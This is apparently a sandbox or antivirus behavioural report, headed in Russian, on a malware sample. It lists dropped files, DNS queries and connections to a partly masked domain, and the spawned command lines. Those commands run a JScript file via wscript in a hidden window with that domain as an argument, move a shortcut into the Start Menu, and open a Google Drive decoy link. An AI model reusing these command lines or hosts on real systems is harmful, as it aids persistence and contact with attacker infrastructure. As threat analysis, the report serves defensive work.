Техническая информация
- %TEMP%\msedge.lnk
- %TEMP%\msedge.lnk
- %TEMP%\mdaxaz.js
- 'do#.##heetshare.org':443
- 'drive.google.com':443
- 'microsoft.com':80
- 'fo###.#oogleapis.com':443
- 'gs##tic.com':443
- 'fo###.gstatic.com':443
- 'do#.##heetshare.org':443
- 'drive.google.com':443
- 'fo###.#oogleapis.com':443
- 'fo###.gstatic.com':443
- 'gs##tic.com':443
- 'ss#.#static.com':443
- DNS ASK do#.##heetshare.org
- DNS ASK drive.google.com
- DNS ASK microsoft.com
- DNS ASK fo###.#oogleapis.com
- DNS ASK gs##tic.com
- DNS ASK fo###.gstatic.com
- DNS ASK ss#.#static.com
- DNS ASK st####.rapidssl.com
- ClassName: 'IEFrame' WindowName: ''
- ClassName: 'Static' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\mdaxaz.js" doc.gsheetshare.org/ 1
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\mdaxaz.js" doc.gsheetshare.org/ 2
- '%WINDIR%\syswow64\cmd.exe' /c start /b wscript "%TEMP%\mdaxaz.js" doc.gsheetshare.org/ 1 & start /b wscript "%TEMP%\mdaxaz.js" doc.gsheetshare.org/ 2 & move "%TEMP%\MSEdge.lnk" "%APPDATA%\Microsoft\Windows\Start Menu\Pro...' (со скрытым окном)
- '%WINDIR%\syswow64\explorer.exe' "https://drive.google.com/file/d/1rT-XtzQljS_dgrsjC1S8bO9dTayqMPlT/view?usp=sharing"
- '%WINDIR%\syswow64\cmd.exe' /c start /b wscript "%TEMP%\mdaxaz.js" doc.gsheetshare.org/ 1 & start /b wscript "%TEMP%\mdaxaz.js" doc.gsheetshare.org/ 2 & move "%TEMP%\MSEdge.lnk" "%APPDATA%\Microsoft\Windows\Start Menu\Pro...